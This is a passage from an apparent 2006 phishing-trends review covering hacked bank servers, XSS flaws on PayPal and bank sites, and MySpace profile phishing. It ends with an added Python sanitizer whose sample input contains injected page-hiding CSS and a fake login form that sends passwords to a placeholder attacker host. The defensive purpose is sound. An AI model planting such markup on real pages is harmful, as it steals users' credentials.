Hacked Bank Sites: Several attacks in 2006 saw phishers hack into bank web servers and use them in attacks. In March, a Chinese bank’s web server hosted phishing sites targeting U.S. banks. The phishing pages were placed in hidden directories on the web server of the China Construction Bank (CCB) Shanghai Branch. This attack was the first instance we’ve seen of one bank’s infrastructure being used to attack another institution. Several weeks later, phishing scammers compromised a server housing the web sites of three Florida banks and redirected their customers to spoof pages. Previous scams managed to manipulate financial sites through cross-site scripting and cross-frame content injection, but didn’t gain access to the server hosting the banks’ sites.
Continued XSS Vulnerabilities: The web sites of some of the world’s leading financial institutions remained vulnerable to attacks using cross-site scripting (XSS), more than two years after Netcraft first highlighted the issue. The most prominent of these was an attack on PayPal that used XSS to insert fraudulent content into a URL hosted on the genuine PayPal web site. The URL used SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate was presented to confirm that the site did indeed belong to PayPal, so the browser gave the victim no visible warning. Random checks of bank web sites by the Washington Post identified XSS weaknesses on the web sites of Visa, JP Morgan Chase, eBay, Bank of America and American Express.
MySpace Phishing: Attacks targeting social networks represent a small percentage of all phishing scams, but became more common in the second half of 2006 as hackers used them to seed botnets through malware distributed on sites like MySpace, LiveJournal and Orkut. MySpace accounts themselves are of limited value, but can serve as a delivery mechanism for keylogging trojans, capturing home computers that may be used for shopping or online banking as well as social networking. Several leading social networks have proven vulnerable to XSS exploits, serving as a laboratory for phishers to test new technical attacks and social engineering techniques. An October attack at MySpace was hosted on a profile page with the username login_home_index_html, and used specially crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form. It was the first major attack using a technique known as a reverse cross-site request.
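As an added defender-side illustration (not code from the original article or from any social network), the following Python sanitizer shows the control that blocks the profile-page pattern described above: user-authored HTML is reduced to an allowlist, and elements that can carry a fake login form or page-hiding CSS are discarded with their whole subtree. The tag policy and the sample profile are assumptions constructed for this example.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist for user-authored profile markup (an assumption for this
# example, not any real site's policy). Containers in DROP_SUBTREE lose their whole
# subtree: they can carry a fake login form or CSS that hides the genuine page.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_SUBTREE = {"script", "style", "form", "iframe", "button", "select", "textarea"}

class ProfileSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()  # convert_charrefs=True: text arrives decoded, re-escaped on output
        self.out, self.drop_depth = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in DROP_SUBTREE:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # unlisted elements vanish; their text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # drops on* handlers, style=, class=, ...
            if name == "href" and not value.lower().startswith(("http://", "https://")):
                continue  # drops javascript: and data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in DROP_SUBTREE:
            self.drop_depth = max(0, self.drop_depth - 1)
        elif not self.drop_depth and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data))

def sanitize_profile_html(markup: str) -> str:
    p = ProfileSanitizer()
    p.feed(markup); p.close()
    return "".join(p.out)

# Constructed sample: genuine profile text plus injected page-hiding CSS and a fake
# login form posting to a placeholder host, the pattern the text describes.
SAMPLE_PROFILE = (
    '<p>Hi, see my <a href="https://example.com/pics">photos</a></p>'
    '<style>#content{display:none}</style><form action="https://attacker.example/c">'
    '<b>Log in again</b><input name="password" type="password"><button>Login</button></form>'
    '<a href="javascript:alert(1)">click</a><b onmouseover="x()">hi</b>'
)
```

Running `sanitize_profile_html(SAMPLE_PROFILE)` keeps only the paragraph, a link stripped of its `javascript:` URL and the bold text, with the stylesheet and the entire form gone.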